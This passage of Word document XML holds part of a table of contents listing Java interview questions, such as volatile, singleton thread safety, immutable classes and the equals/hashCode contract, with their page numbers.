                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>63</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4AF3975C" w14:textId="312959C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2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volatile in java? Where can we use it?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307520 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>65</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7E027C02" w14:textId="40B73F5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2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an idempotent method in java?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307521 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>67</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="405C65E4" w14:textId="55BA4BF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2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final, static and non-static (instance) in java?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307522 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>68</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="33BDBDC3" w14:textId="1EC62D1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2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will I use two threads using a singleton design pattern?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307523 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>71</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1125A4D4" w14:textId="0C16D6D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2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implement thread safety in java using singleton?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307524 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>72</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6C311B53" w14:textId="2A11817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2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rite an immutable class in Java?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307525 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>75</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="32F235D7" w14:textId="5A1E821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2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Can we override the protected method?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307526 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>76</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="11084828" w14:textId="3E17313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2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marker interface in java? What is the purpose of the marker interface?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307527 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>77</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="05C4F236" w14:textId="7A27B41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2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can we ignore the finally block?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307528 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>79</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6F8CC6A0" w14:textId="63661CB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2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synchronous and asynchronous call?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307529 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>80</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="06ACCD22" w14:textId="616D5D9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3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Can we write the main method as private?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307530 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>82</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2E463F22" w14:textId="06CBB93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3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use of static keywords in java?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307531 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>83</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="57F0D484" w14:textId="575E8AB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3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inner class? Have you used inner class in your project?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307532 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>85</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4D15ABA3" w14:textId="7C02343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3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purpose of inner class?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307533 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>87</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="53666454" w14:textId="468AA00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3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Enum? Write a syntax for enum?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307534 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>90</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1A23DBBC" w14:textId="1E87FE2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3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static and non-static in java?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307535 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>91</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6CB18061" w14:textId="7708F89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3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can we break the singleton pattern?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307536 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>92</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7096F535" w14:textId="345B264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3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default and protected access modifier?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307537 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>96</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6A49E8B7" w14:textId="0CE60A1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3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y is string immutable?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307538 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>97</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="30719510" w14:textId="6C07FE8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3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an immutable class?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307539 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>98</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="107065D3" w14:textId="3EC03A2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4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atomic integer in java?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307540 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>101</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="42FF0F6B" w14:textId="50FA542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4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can you make a singleton class as thread safe?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307541 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>102</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4DFF4573" w14:textId="5E59F8F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4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compareTo and compare method?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307542 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>104</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="551834DA" w14:textId="7469506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4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return type of compare method?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307543 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>106</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1CB07480" w14:textId="69C2B34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4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contract in equals and hashcode method?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307544 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>107</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="38721C28" w14:textId="1DD1A73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4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Marker interface and Functional interface?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
